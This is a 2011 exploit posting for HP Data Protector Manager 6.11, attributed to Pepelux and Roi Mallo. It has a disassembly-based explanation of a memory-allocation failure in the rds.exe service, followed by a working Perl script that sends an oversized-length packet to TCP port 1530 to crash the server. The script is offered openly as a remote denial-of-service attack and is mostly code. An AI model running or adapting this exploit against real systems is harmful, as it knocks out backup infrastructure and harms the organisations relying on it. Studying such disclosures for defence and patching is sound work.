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HP Data Protector Manager 6.11 Denial Of Service

HP Data Protector Manager 6.11 Denial Of Service
Posted Jan 8, 2011
Authored by Pepelux, Roi Mallo

HP Data Protector Manager version 6.11 remote denial of service exploit.

tags | exploit, remote, denial of service
SHA-256 | 3589724eb2375aceb76e69a3c77d8eeebe728b528ecbb0e3674b17dfc345d2f4

HP Data Protector Manager 6.11 Denial Of Service

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# ===============================
# HP Data Protector Manager v6.11
# ===============================
# Bug: Remote Denial of Service Vulnerabilities (RDS Service)
# Software: http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html
# Date: 08/01/2011
# Authors: Roi Mallo - rmallof[AT]gmail[DOT]com
# http://elotrolad0.blogspot.com/ - http://twitter.com/rmallof
# Pepelux - pepelux[AT]enye-sec[DOT]com
# http://www.enye-sec.org - http://www.pepelux.org - http://twitter.com/pepeluxx
# Vulnerable file: Program Files\OmniBack\rds.exe
# Tested on Windows XP SP2 && Windows XP SP3
# POC:
# _ncp32.dll is the responsable of waiting the packet (RECV)
# when a packet is received, it uses _rm32.dll to allocating memory,
# as the size is too big, malloc can't allocate this size and the program exit.
# _ncp32.dll
# 00482F92 68 7DFAF908 PUSH 8F9FA7D
# 00482F97 6A 00 PUSH 0
# 00482F99 6A 01 PUSH 1
# 00482F9B 6A 00 PUSH 0
# 00482F9D 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8] ; packet size (64000000h)
# 00482FA0 52 PUSH EDX
# 00482FA1 E8 9C2D0000 CALL <JMP.&_rm32.#20_rm_getMem>
# _rm32.dll
# 0038C49B 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] : packet size (64000000h)
# 0038C49E 83C0 08 ADD EAX,8
# 0038C4A1 50 PUSH EAX
# 0038C4A2 FF15 F4733A00 CALL DWORD PTR DS:[<&MSVCR71.malloc>] ; MSVCR71.malloc --> Returns 0 because no space available
# ......
# 0038C5F9 50 PUSH EAX
# 0038C5FA 68 2C0C3A00 PUSH _rm32.003A0C2C ; ASCII "rm_getMem: out of memory, allocating %u bytes. Called from %s"
# 0038C64E E8 8D220000 CALL _rm32.rm_errorExit

use IO::Socket;

my ($server, $port) = @ARGV ;

unless($ARGV[0] || $ARGV[1]) {
print "Usage: perl $0 <host> [port]\n";
print "\tdefault port = 1530\n\n";
exit 1;

$port = 1530 if !($ARGV[1]);

if ($^O =~ /Win/) {system("cls");}else{system("clear");}

my $buf = "\x23\x8c\x29\xb6"; # header (always the same)
$buf .= "\x64\x00\x00\x00"; # data packet size (too big)
$buf .= "\x41"x4; # data

print "[+] Connecting to $server:$port ...\n";

my $sock1 = new IO::Socket::INET (PeerAddr => $server, PeerPort => $port, Timeout => '10', Proto => 'tcp') or die("Server $server is not available.\n");

print "[+] Sending malicious packet ...\n";
print $sock1 "$buf";
print "\n[x] Server crashed!\n";

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